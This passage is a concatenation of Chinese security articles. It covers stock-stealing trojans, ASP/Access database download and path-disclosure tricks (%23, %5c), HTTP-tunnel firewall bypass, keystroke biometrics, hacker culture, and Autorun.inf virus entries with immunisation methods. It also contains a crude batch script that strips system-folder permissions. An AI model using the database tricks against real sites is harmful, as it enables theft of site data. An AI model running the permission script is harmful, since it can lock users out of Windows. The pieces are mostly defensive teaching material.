据江民反病毒专家介绍，目前此类病毒的作案手段更加隐蔽，病毒除了使用rootkit等技术隐藏自身外，还可以通过网络不断升级，从而避开杀毒软件查杀，对股民账户资金安全威胁更大。

哈尔滨市民何先生说，他准备五一后去证券公司开户，在看到江民安全宣传活动后感觉很有收获，决定在开户前先把自己日常使用的杀毒软件进行升级更新，避免遭受“证券大盗”侵害。

江民反病毒专家提醒用户，针对“证券大盗”等病毒，只要日常保持更新杀毒软件病毒库，开启“系统监测”和“网页监控”等功能，给操作系统勤打补丁，即可有效防范此类病毒侵害。同时，股民用户应当给自己股票交易账户设定复杂的密码，并养成使用软键盘输入密码以及交叉输入密码的习惯，以避免木马病毒通过击键记录以及屏幕快照等方式盗取密码。

新华社：专家提醒股民 牛市更需当心"证券大盗"

新华网北京４月２５日电（记者崔军强）近一段时间以来，沪深股指连创新高，股民网上交易频繁。北京江民公司的反病毒专家提醒，每逢股市处于“牛市”，“证券大盗”等网络病毒都会集中发作，而绝大多数证券公司都声称不承担任何由病毒造成的损失，股民应防范网上证券交易风险。

据江民反病毒专家介绍，“证券大盗”属于一种特洛依木马，它可以自动识别多家证券公司的网页。当股民登录证券交易网页时，“证券大盗”便开始记录键盘动作，同时使用计算机的屏幕快照功能抓拍网页，然后将交易账户、密码等信息发送到黑客指定邮箱中。２００４年，一个犯罪团伙曾利用“证券大盗”窃取股民账户、密码，在不到两个月时间内盗买、盗卖股票价值１１００多万元。

对于“证券大盗”等病毒，证券公司普遍认为应由股民承担风险。一家证券公司的风险提示写道：进行网上交易时用户有可能会受到黑客、病毒的攻击，因此造成的损失由用户自己承担。反病毒专家提醒，黑客技术不断升级，病毒更新速度越来越快，使网上证券交易风险大大增加，股民应加强自我防范意识，不要随意打开不明邮件、网页链接，不要下载使用未经无毒验证的软件，并做到以下几点：

一是安装使用带有主动防御、隐私信息保护功能的杀毒软件，及时安装微软发布的安全漏洞补丁，及时升级杀毒软件病毒库，并在上网时启用实时监控功能；

二是将网上交易账号和密码设为隐私信息保护状态，阻止病毒向外发送信息；

三是登录交易系统时使用软键盘，通过点击鼠标输入交易账号及密码，交易完成后及时退出网上交易程序；

四是如果发现网上交易有异常现象，应及时通过其他交易方式修改交易密码，暂停使用网上交易。（完）

利用下载漏洞对数据库发起网络上的攻击

利用下载漏洞对数据库发起网络上的攻击

作者：smtk　来源：赛迪网安全社区

作为脚本漏洞的头号杀手锏——数据库下载漏洞，现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代，漏洞产生后随之而来的就是各种应对的招数，比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了，但事实往往不如你我所愿，即使你这么做了也难逃被高手攻击的命运。为此我们有必要去了解一些攻击的手法，来增强自己的安全技能。

1．强制下载后缀名为ASP、ASA的数据库文件

大多数的网管为了节省时间，网站上的文章系统、论坛等程序都是直接下载别人的源程序再经过部分修改后使用的。而现在很多人做的ASP源程序都已经将数据库的后缀由原先的MDB改为了ASP或ASA。本来这是好事，但在这个信息极度膨胀的社会，老的方法所能维持的时间毕竟有限。对于ASP或ASA后缀的数据库文件，黑客只要知道它们的存放位置，就能轻易地用迅雷这样的下载软件下载得到。

2．致命符号——＃

很多网管以为在数据库前面加个#号就可以防止数据库被下载。是啊，我当时也认为IE是无法下载带有#号的文件的(IE会自动忽略#号后面的内容)。但是“成也萧何，败也萧何”，我们忘记了网页不仅能通过普通的方法访问，而且用IE的编码技术也能访问到。

在IE中，每个字符都对应着一个编码，编码符%23就可以替代#号。这样对于一个只是修改了后缀并加上了#号的数据库文件我们依然可以下载。比如#data.mdb为我们要下载的文件，我们只要在浏览器中输入%23data.mdb就可以利用IE下载该数据库文件。这样一来，#号防御手段就形同虚设一般。

3．破解Access加密数据库易如反掌

有些网管喜欢对Access数据库进行加密，以为这样一来就算黑客得到了数据库也需要密码才能打开。但事实正好相反，由于Access的加密算法太脆弱，所以黑客只要随便到网上找一个破解Access数据库密码的软件，不用几秒钟就能得到密码。

4.瞬杀——数据暴库技术

本来数据库暴库技术应该是属于脚本漏洞的行列，之所以拿到这里来说是因为它在数据库下载漏洞中起到了举足轻重的作用，如果仔细一点，读者会发现上面的技巧都是假定知道数据库名的情况下才能实施的。但很多时候我们根本不可能知道数据库的名字，这时我们可能会感到很沮丧，觉得无法再进行下去，但数据库暴库技术的出现不仅可以一扫我们的沮丧情绪，也能让我们真正地将前面的技术综合起来利用。

很多人在用ASP写数据连接文件时，总会这么写(conn.asp)：

db="data/rds_dbd32rfd213fg.mdb"

Set conn = Server.CreateObject("ADODB.Connection")

connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)

conn.Open connstr

function CloseDatabase

Conn.clo

se

Set conn = Nothing

这段语句看上去觉得并没什么问题，而且数据库的名字取得很怪，如果没有数据库暴库技术我们能猜到这样的数据库名的几率几乎为零。但就是这么简短的语句却隐藏着无限的信息。可以说网上绝大部分的程序都存在这个漏洞。我们只要将地址栏上在数据连接文件conn.asp(一般为这个)前的/用%5c替代就可以暴到数据库的位置，接下来的事情应该不需要我说了吧？大家只要开动脑筋没有什么事情是做不成的。

开机启动防木马大行动

开机启动防木马大行动

对于大部分朋友来说，上网遇见的最麻烦的事情莫过于遇上流氓软件，不知不觉的就中上了，想删也删不掉，尽管现在有很多专门删除这些流氓软件的工具，但是大部分人也只是忍忍，并不会真正动手去找到工具来删除他，所以，我们做好防御是相当重要的。

那么我们如何才能做好防御呢？要知道如何防御，我们得知道流氓软件以及一些黑客木马的原理才行，那么下面我们简单了解一下。

大部分的流氓软件，无非就是在你的%systemroot%下面自动生成一个dll文件，然后通过这个dll文件，来达到“流氓”的目的。而黑客木马更是如此，只不过比较复杂一点，那么我们现在的目的就是防止流氓软件以及一些黑客木马在%systemroot%下面建立文件，通俗一点说，就是不给当前用户有对%systemroot%写入的权限。那也许你会问了，我们新建立一个用户，限制一下权限，不就可以达到目的了吗？其实这话也不假，但是我们知道在windowsNT内核下。不同的用户拥有不同的配置文件，如果你想让当前用户玩游戏、浏览网页，而又要避免中流氓软件。我们只有注销，然后切换到另一个权限被限制的用户上面，当不想玩游戏了，又得切换回来。但是不要忘记。在注销的时候，也会让流氓软件或者黑客木马有机可乘。

所以我们今天就是想让我们玩游戏的时候，直接启动之后，连上internet，就可以防止流氓软件以及黑客木马了。

步骤一：建立“防启动系统”

（方法一）

既然这样，我们就需要在boot.ini设置了，boot.ini是什么文件呢？相信有点计算机知识的朋友都知道，如果不知道怎么办？不用着急。请你去黑客基地论坛新手学堂看一下剖析boot.ini这文章，地址连接是：http://bbs.hackbase.com/viewthread-2868505-1.html

好，我们先修改我们的boot.ini，让我们进入系统的时候，可以选择“防流氓系统”，在此之前，请将boot.ini的只读属性去掉

然后我们才可以修改boot.ini这个文件

正常的boot.ini应该是

[boot loader]

timeout=5

default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="

MicrosoftWindowsXPProfessional"/noexecute=optin /fastdetect

具体的参数我就不解释是什么意思了，今天的重点不在这，如果你想知道参数的意思，请到上面提到的剖析boot.ini去寻找解释吧。

我们再去掉boot.ini的只读属性之后，在下面加上一行

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="防流氓系统"

/noexecute=optin /fastdetect

然后保存，再把boot.ini的只读属性加上，这样我们进入系统的时候，他会提示你选择系统，我们就可以看到

我们选择防流氓系统就可以进入了。

小名：如果由于某某原因，我不能这样做怎么办呢？

大名：我总是配置错系统，下次进系统的时候，我又想恢复他。又想启用防流氓系统怎么办？

不要着急，我们还有方法二

（方法二）

那么我们一定会想到修改系统F8的高级选项。我们在启动系统的时候，直接按F8，可以进入安全模式，那我们能不能实现按F8之后，选择“防流氓系统”呢？当然可以~

我们找到NTLDR，同样把只读属性去掉，然后用UltraEdit-32打开他

我们把最后一次正确的配置修改为防流氓系统，将光标移到最后一次的前面，然后输入防流氓系统，后边的文字用空格代替，注意：不要打倒格，打错字重新修改，空格必须要严格打到“置”的地方，然后保存。

步骤二：实现开机防流氓

我们修改的以上步骤。都只是修改了一下名字，事实上，还与原来的性质保持没变，那么现在我们就需要实施防流氓政策了。

小名：是不是一启动的时候就可以防流氓了呀？好高兴哦

大名：你高兴个P，到底怎么实施呀？

其实很简单。就是把一个文件加入到启动项里面。开机的时候就启动他。从而达到防流氓的效果

小名：对啊，好聪明啊

大名：聪明个P。那前面做的那些还有什么用，只不过是给人主观上的感受罢了，实际上没什么用。

恩….确实没什么用..是由于本人太菜了，还不知道如何通过boot.ini来达到启动文件的效果，而且还只能让指定的系统来启动，剩下的那个系统不启动。而且只有一个系统，如果哪位高人知道的话，请一定教导教导我呀

加入一段批处理。内容如下

@echo off

setlocal

cls

color 7

title 防流氓主程序 v1.0

echo 欢迎进入防流氓主程序v1.0

echo by 无名[hackbase]

if not %OS%==Windows_NT echo 本程序只能在WindowsNT以上系统运行！ & goto exit

echo 此程序由于开发过粗糙，在退出系统的时候，请执行xf.bat否则进不去系统的，后果自负

echo 切记~~切记~~~

echo 是否启用防流氓程序？[y/n]

set /p host=

if {%host%}=={y} echo 防流氓程序正在启动...........OK! & goto :loop

if {%host%}=={n} echo 防流氓程序没有启动成功 & exit

echo 请输入当前用户名

set /p user=

if {%user%}=={} echo 请输入当前用户名! ||exit

:loop

cacls %systemroot% /p %user%:N

echo 第一阶段设置成功...........OK!

cacls %systemroot%/system32 /p %user%:N

echo 第二阶段设置成功...........OK!

goto :ok

:ok

echo 恭喜你，防流氓程序设置成功

@pause

保存为wuminger.bat

另外还有一个xf.bat

@echo off

setlocal

cls

color 7

title 防流氓退出主程序 v1.0

echo 欢迎进入防流氓退出主程序v1.0

echo by 无名[hackbase]

echo 请输入当前用户名

?? set /p user=

if {%user%}=={} echo 请输入当前用户名! ||exit

cacls %systemroot% /p %user%:F

cacls %systemroot%/system32 /p %user%:F

echo 防流氓程序成功退出

@pause

然后我们把他加到启动项里（具体见后）

运行regedit,打开注册表，然后找到

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

我们新建一个字符串

然后把路径指向我们的wuminger.bat 我的wuminger.bat放在C盘根目录下

编辑一下就行了

这回等我们启动的时候，按照提示就可以防木马了。

安全宝典之个人电脑上网安全防护指南

作者：smtk　来源：赛迪网安全社区

1.如果不是必须，不必填写你的个人资料

在允许留空的地方留空就行了。

2.如果不是必须，不必填写你的真实资料

如果可以，不妨填写一个虚拟的资料。如果你怕以后忘了，可以填写一个固定的虚拟的资料，把它保存在一个地方，如你的邮箱里。

3.E-mail、手机号码不要直接发布在公开显示的地方

E-mail只要公开了，处于可被搜索引擎抓取的地方，100%会成为一个垃圾场。

4.避免你的昵称和真实身份联系在一起

如果你不想让身边的人知道你网上的身份，或者不想让网上的人知道你现实的身份。

5.谨慎使用“记住密码”的功能

随时清除Cookies，这一点对多人共用计算机适用。

6.不要一个邮箱通天下

用于和机器打交道的E-mail应该和用于和人打交道的E-mail分开。你可以用某个信箱专门用来注册，这样可以保证最大的安全。

7.不要一个昵称通天下

想想Mop的人肉搜索吧，你应该知道，如果在多个网站、论坛使用同一个昵称，如果别人需要，很容易可以追踪到。

8.不要一个密码通天下

至少，你使用某一个服务时，你的服务密码和在这个服务里所留的E-mail密码不要一样。如果你的某帐号被盗，你取回密码到邮箱，发现邮箱已经顺带被搞定了。

9.如果短时间内有大量QQ添加你为好友，拒绝

QQ号码申诉的条件之一就是知道你好友里的五个号码。

10.不要点击任何E-mail里和IM里传送过来的网址

保护系统 看你键入密码的速度是否够快

保护系统　看你键入密码的速度是否够快

作者：杜莉　来源：赛迪网

有一种能够测量你按键速度的技术，它能够在登录的时候提供一定程度的“生物安全保护”。

系统现在可以利用敲击键盘的速度来判定你是否可以浏览银行账户详细信息或者使用其他线上服务。

一家致力于降低身份信息丢失的风险的美国公司，近日将“生物安全”概念引入到了密码系统中来，用户必须以一致的速度键入用户名和密码才能正常登录。

该项技术能够测量用户按压那些按键的时间，还有敲击的间隔时间。该技术利用了这样一个事实：大多数用户的按键方式都是固定的，并且是特有的——尤其是那些频繁使用的单词，例如用户名和密码。

注册的时候，用户键入自己详细信息9次，系统可以根据键入的速度建立特征档案。以后用户想要登录时，系统就会将其键入速度与这份档案进行比照。该公司称这种系统识别同一用户的按键输入的精度是99%，它使用的是一种叫做“行为生物计量”的原理。

“随着身份窃贼越来越猖狂，数据保护变得越来越重要了，人们需要更便携并且更有效的身份认证方法，”生物密码公司产品策略安全部的副总Jared Pfost说，“这是一项很划算的解决方案，它不需要用户作任何改变。”

如果用户键入得比平常更有力—或者无力，他们就需要回答额外的安全问题，才能成功地登录。

一旦时代在线使用了该程序，记者们各自独一无二的键入风格就不会轻易地被复制。同样的，他也无法模仿其他打字员的键入方式，无论他们坐得有多近，观察多仔细。

生物密码是位于华盛顿州的一家公司，他们将与银行所采用的、钥匙圈大小的那种随机生成数字以供用户登录的装置进行竞争，跟那个装置一样，它也能提供额外一重的安全保护。

但是，安全专家对这项技术持怀疑态度，他们认为尽管它已经存在了有一段时间了，但是在经过大量调查验证之前，它的使用范围还将是很有限的。

“如果你受过打字员的训练的话，会怎样呢？你的打字方式会跟其他受过相同教育的打字员的一样吗？”NCC集团的技术总监Paul Vlissidis说。“还有，每次修改密码的话，系统就得重新校准。如果用指纹的话，你只需要记录一次就行了。”

剑桥大学的计算机科学专家Ross Anderson并不看好这项技术，“这项技术已经有20年的的历史了，以前人们反复尝试过，都失败了，按键的方式是实在是太多种多样了。”

第二次世界大战的时候，人们就提出了按键识别的概念，当时莫尔斯电码的操作员利用它来确认发送者的身份，但是上世纪80年代的时候，人们才正式开发了这项技术。

Windows程序早就能捕捉按键信息了，Mr Pfost说，他自己以前就在微软供职，但这是人们第一次将这种技术作为一项安全措施进行商业化操作。

这种生物密码目前在美国已经拥有了50多家客户——大部分是小银行和建筑行业的，它最近声称已经保护了1100万（550万英镑）美元的风险投资基金。

=============================================

【参考文章】Jonathan Richards《How quickly did you type that password?》

如何使 TCP包和 UDP包穿透网络防火墙

作者：smtk　来源：赛迪网安全社区

通过Http Tunnel(Http 隧道)技术同时逃过防火墙屏蔽以及系统追踪的试验，我们可以看到网络安全仅仅依靠某种或某几种手段是不可靠的，同时对安全系统的盲目性依赖往往会造成巨大的安全隐患。希望通过本文能引起管理员对网络安全防护系统的思考。

什么是Http暗藏通道

什么是局域网安全，系统管理员怎样才能保障局域网的安全？这是一个不断变化的安全概念，很长的一个时期以来，在局域网与外界互联处放置一个防火墙，严格控制开放的端口，就能在很大程度上掌握安全的主动权，方便的控制网内外用户所能使用的服务。比如，在防火墙上仅仅开放80、53两个端口，那么无论是内部还是外面的恶意人士都将无法使用一些已经证明比较危险的服务。

但要注意一点，防火墙在某种意义上是很愚蠢的，管理员对防火墙的过分依赖以及从而产生的懈怠情绪将不可避免的形成安全上的重大隐患，作为一个证明，“通道”技术就是一个很好的例子，这也是本文要讨论的。

那么什么是通道呢？这里所谓的通道，是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上，然后穿过防火墙与对端通讯，当封装的数据包到达目的地时，再将数据包还原，并将还原后的数据包交送到相应的服务上。举例如下：

A主机系统在防火墙之后，受防火墙保护，防火墙配置的访问控制原则是只允许80端口的数据进出，B主机系统在防火墙之外，是开放的。现在假设需要从A系统Telnet到B系统上去，怎么办？使用正常的Telnet肯定是不可能了，但我们知道可用的只有80端口，那么这个时候使用Http Tunnel通道，就是一个好的办法，思路如下：

在A机器上起一个Tunnel的Client端，让它侦听本机的一个不被使用的任意指定端口，如1234，同时将来自1234端口上的数据指引到远端(B机)的80端口上(注意，是80端口，防火墙允许通过)，然后在B机上起一个Server，同样挂接在80端口上，同时指引80端口的来自Client的转发到本机的Telnet服务端口23，这样就ok了。现在在A机上Telnet本机端口1234，根据刚才的设置数据包会被转发到目标端口为80的B机，因为防火墙允许通过80端口的数据，因此数据包畅通的穿过防火墙，到达B机。此时B机在80端口侦听的进程收到来自A的数据包，会将数据包还原，再交还给Telnet进程。当数据包需要由B到A返回时，将由80端口再回送，同样可以顺利的通过防火墙。

可叹！黑客意义歪曲 网上教黑何时休

可叹！黑客意义歪曲 网上教黑何时休

作者：lynn　来源：赛迪网技术社区

在Internet上，黑客与黑客组织办的传授黑客技术的站点比比皆是，随便用搜索引擎搜索一下就能找到一大堆。这些黑客站点提供黑客工具，公布系统漏洞，公开传授黑客技术，进行黑客教学，甚至还有网上论坛、网上聊天相互交流黑客技术经验。黑客事件的剧增，黑客组织规模的扩大，黑客站点的大量涌现，也说明了黑客技术开始普及，甚至很多十多岁的年轻人也有了自己的黑客站点，从很多BBS上也可以看到学习探讨黑客技术的人也越来越来多，我们可以禁止有害书籍刊物的传播，却难以禁止Internet上有害信息的传播交流。

黑客速成侵蚀互联网安全

随着黑客工具的简单化和傻瓜化，众多技术水平不高的用户也可以利用手中的黑客工具大肆进行攻击（这些人又被称为“灰客”）。最主要的是，互联网这个载体上流传着太多的黑客教程和黑客工具，而且极易获得。据IT168的调查显示，有55.4%的网友认为黑客教程和工具“很容易获得”，69.7%的人访问过黑客的技术交流站点，并有43.5%的人下载过黑客软件。如果不能很好的控制黑客站点内容传播的话，将使安全变得不可控制。

当你在搜索引擎中输入”黑客”这个词时，你面前将展现出这样一些词汇：黑客软件、黑客技术、黑客站点、黑客论坛等，里面包含大量信息传授你如何使用一些简单的攻击程序来侵入和占有别人的计算机系统。在这些网站上，有的还承诺让你一个月之内成为黑客高手，或成功入侵别人的系统。这样的网站，据说收益还都相当的可观。曾经参加过“中美黑客大战”的几位“圈里人”坦言：黑客事件越来越多的一个的重要原因是黑客工具越来越多，越来越容易获得，也越来越傻瓜化和自动化。圈里一位曾经做过黑客技术培训的黑客对记者谈到：“就拿‘灰鸽子’来说，网上学会这一技能的报价最高是人民币200元，最低只需要50元，学习的时间从一周到一个月不等。”

按照这种方式培训出来的所谓的”黑客”，实际上是只能够使用一些简单的黑客工具，对一些安全系数很低的系统进行扫描并控制的人，是一群只知其然而不知其所以然的初级网络爱好者。

青少年抵抗诱惑的能力较差，“黑客”网站正是看重这点，在对那些青少年互联网技术爱好者进行不遗余力的商业挖掘。他们在灌输：只要交纳一定的学费，就有可能在短时间内成为“黑客”。

在美国，对黑客教程限定是这样的：黑客教程必须分成两部分，一部分分析漏洞的产生、CPU原理等，以及如何利用这个漏洞进行攻击；另外一部分必须讲如何去防止这个漏洞，或者是有了漏洞，发生攻击之后的应急方法是什么。最主要的是，无论谁去学习此教程，必须是实名的。在美国注册必须是实名的，必须有VISA卡，并且先交款，之后才能看到教程。不像国内，在一个论坛帖子里就能看到完整的黑客教程。而且这个教程是不规范的，可能不带有怎么防范攻击的内容，只教你如何攻击网站。

黑客含义已被利益歪曲

最初，“黑客（HACKER）”是一个褒义词，指的是那些尽力挖掘计算机程序最大潜力的电脑精英。黑客是那些构建了互联网结构和框架的人，是发明了Unix操作系统和World Wide Web（WWW）的人。黑客是能够以独特的方法解决复杂问题的人，是能够以简单的方法构造复杂系统的人。黑客还是对代码有着深刻的认识，对未知问题有着强烈好奇心的人。能如同音乐指挥家指挥交响乐团一样，指挥各种各样的代码并组成一个精巧的系统；能如同数学大师一样用优雅的方程式来解决网络中复杂的问题。

而在无数起黑客攻击事件发生之后，尤其是那些带有强烈经济利益目的的攻击事件，使得“黑客”这个词变了味道。一些黑客站点只顾如何教人攻击别人的电脑、盗密码，而国外的黑客，研究的是系统级别的漏洞，攻击的也是此类漏洞。现在人们对黑客的理解是：不受任何互联网协议约束的人，是任何防范措施都对之无可奈何的人，是可以进入任何系统，而不向任何人屈服的人。本领高强的标准是能够控制多少系统，而不是像传统黑客精神那样是看对复杂问题的解决能力。这已经影响到了人们对真正意义的黑客的看法。比如曾有黑客提醒一些网络运营商修补漏洞，并且指出了网站存在的问题，但网站根本不予理睬，甚至还要反过来指责指出问题的人。说到底还是人的观念问题，公司对自己的网站安全不重视，光靠黑客的呼吁是爱莫能助的。有的黑客实在看不下去，就主动帮人家修补了漏洞。

一些看不惯目前只受利益驱使的黑客现象的黑客们都金盆洗手了，他们认为：目前国内黑客的现状是一盘散沙，黑客组织的网站不再是技术与自由的追求，而是越来越向商业的一种转变。确切地说，在国内的黑客界存在着金钱影响力上升的问题，有些人为了赚钱什么都干。 比如有些黑客的主要工作是针对某些流行的网络游戏进行盗号，将游戏的一些重要数据拿到手后再转手卖给别人。些黑客组织只重视教人攻击，这些行为也很可悲，这些人只是看中钱，而非真正的黑客技术。真正教人黑客知识，应该从黑客精神、理念、文化、历史讲起。

而一名黑客最终的归宿是从事维护网络安全的工作，还有一类是不从事和计算机网络有关的职业，但是一直保持研究相关的技术，他们可能生活不算富裕，但这些人往往都是顶级的黑客。(T002)

对Autorun.inf类病毒(U盘病毒)的攻防经验总结

参考阅读：

三点高招教你解除闪存盘内的病毒！



U盘病毒和Autorun.inf文件分析



小技巧: 关闭移动硬盘或U盘自动播放功能



感染传播型木马以及U盘木马注意事项



双击无法打开驱动器/无法显示隐藏文件 教你如何查杀病毒



双击无法打开驱动器情况下的杀毒方法



U盘病毒/Autorun病毒专杀工具：RavMonE Killer.exe



技术分析系列之详解来自Autorun的攻击



U盘autorun病毒专杀工具 在 我的网络硬盘 提供下载


“RavMonE.exe"、"rose.exe"、"sxs.exe"、"copy.exe"、"setup.exe"...根目录下的神秘幽灵，系统安全的杀手，它们被称作“U盘病毒”。无数Windows用户，都在为它们而焦头烂额。这一篇文章是一篇对自己对U盘病毒的研究和与U盘病毒斗争的经验教训的总结。

Windows 95以后的系统都有一个“自动运行”的功能。通过在卷插入时读取磁盘卷上的Autorun.inf文件来获得Explorer中卷的自定义图标和对卷图标的上下文菜单进行修改，并对某些媒体自动运行Autorun.inf中定义的可执行文件。05年以后，随着各种可移动存储设备的普及，国内有些黑客制作了盗取U盘内容并将自身复制到U盘利用Autorun.inf传播的病毒。著名的伪ravmon、copy+host、sxs、Viking、熊猫烧香等著名病毒都有这种传播方式。它们有时是根目录下的神秘幽灵，有时是出现在不应该出现的地方的回收站，总之，它们是系统安全的严重威胁。

Autorun.inf被病毒利用一般有4种方式

1.

OPEN=filename.exe

自动运行。但是对于很多XPSP2用户和Vista用户，Autorun已经变成了AutoPlay，不会自动运行它，会弹出窗口说要你干什么。

2.

shellAutocommand=filename.exe

shell=Auto

修改上下文菜单。把默认项改为病毒的启动项。但此时只要用户在图标上点击右键，马上发现破绽。精明点的病毒会改默认项的名字，但如果你在非中文的系统下发现右键菜单里多出了乱码或者中文，你会认为是什么呢？

3.

shellexecute=filename.exe

ShellExecute=....只要调用ShellExecuteA/W函数试图打开U盘根目录，病毒就会自动运行。这种是对付那些用Win+R输盘符开盘的人。

4.

shellopen=打开(&O)

shellopenCommand=filename.EXE

shellopenDefault=1

shellexplore=资源管理器(&X)

这种迷惑性较大，是新出现的一种形式。右键菜单一眼也看不出问题，但是在非中文的系统下，原形毕露。突然出现的乱码、中文当然难逃法眼。

面对这种危险，尤其是第四种，仅仅依靠Explorer本身，已经很难判断可移动磁盘是否已经中毒。而在这种情况下，一部分人也根据自己的经验，做出了“免疫”工具。

免疫的办法（对可移动磁盘和硬盘）

1、同名目录

目录在Windows下是一种特殊的文件，而两个同一目录下的文件不能同名。于是，新建一个目录“autorun.inf"在可移动磁盘的根目录，可以防止早期未考虑这种情况存在的病毒创建autorun.inf，减少传播成功的概率。

2、autorun.inf下的非法文件名目录

有些病毒加入了容错处理代码，在生成autorun.inf之前先试图删除autorun.inf目录。

在Windows NT Win32子系统下，诸如"filename."这样的目录名是允许存在的，但是为了保持和DOS/Win9x的8.3文件系统的兼容性（.后为空非法），直接调用标准Win32 API中的目录查询函数是无法查询这类目录中的内容的，会返回错误。但是，删除目录必须要逐级删除其下的整个树形结构，因此必须查询其下每个子目录的内容。因此，在“autorun.inf"目录建一个此类特殊目录，方法如"MD x:autorun.infyksoft.."，可以防止autorun.inf目录轻易被删除。类似的还有利用Native API创建使用DOS保留名的目录（如con、lpt1、prn等）也能达到相似的目的。

3、NTFS权限控制

病毒制造者也是黑客，知道Windows的这几个可算是Bug的功能。他们可以做一个程序，扫描目录时发现某目录名最后一个字节为'.'则通过访问"dirfullname.."、或者通过利用Windows NT的Native API中的文件系统函数直接插手，删除该特殊目录。

因此，基于更低层的文件系统权限控制的办法出现了。将U盘、移动硬盘格式化为NTFS文件系统，创建Autorun.inf目录，设置该目录对任何用户都没有任何权限，病毒不仅无法删除，甚至无法列出该目录内容。

但是，该办法不适合于音乐播放器之类通常不支持NTFS的设备。

这三步可谓是一步比一步精彩。但是，最大的问题不在怎么防止生成这个autorun.inf上，而是系统本身、Explorer的脆弱性。病毒作者很快就会做出更强大的方案。这是我的预想。

1、结合ANI漏洞，在autorun.inf里将icon设成一个ANI漏洞的Exploit文件（经过我的实验，发现Windows有一种特性，就算把ani扩展名改为ico，还是可以解析出图标），这样只要一打开“我的电脑”，未打补丁、无杀软的系统就会直接遭殃。这样的东西还可以放到网上的各种资源ISO中。

2、提高病毒的整体编程水平，综合以上各种反免疫方式，另外利用多数国内windows用户常以高权限登录系统的特点，自动将没有权限的Autorun.inf目录获得所有权、加读写删除权限，击破这最坚固的堡垒。

面对如此恐怖的东西，对付的办法已经不多了。但是它们其实是一切windows安全问题的基本解决方案，

1、一定要将系统和安全软件保持在最新状态。即使是盗版用户，微软也不会不给重要级别的安全更新，也从来没有过在重要级别安全更新中加入反盗版程序的记录。

2、尽量以受限制的帐户使用系统和上网，这样可以减少病毒进入系统的概率。Vista之所以加入UAC功能，正是因为它能够使用户在尽量方便的同时，享受到受限用户的安全。

3、某种程度上，可以说QQ、IE和某些装备能换真钱、什么都要真钱的网游是导致大量病毒木马编写者出现的“万恶之源”。通过IE漏洞，制作网页木马，安装盗号程序，盗取账号，获得人民币。这条黑色产业链中，IE其实是最容易剪断的一环。珍爱系统，系统一定要更新，要有能防止网页木马的杀毒软件，用IE不要乱上各种小型下载站、色情网站等高危站点，如果有可能，使用非IE引擎的浏览器。

4、恶意捆绑软件，现在越来越和病毒木马接近。部分恶意软件的FSD HOOK自我防御程序可能被病毒利用来保护自己（如SONY XCP事件），而一些恶意软件本身就是一个病毒木马的下载器。因此，不要让流氓接近你的机器。

Autorun.inf的攻防战还在继续，只会变得越来越精彩，网民的安全意识会在攻与防的对立与统一中获得突破性的进展。

yksoft1 原创于 2007年5月6日凌晨.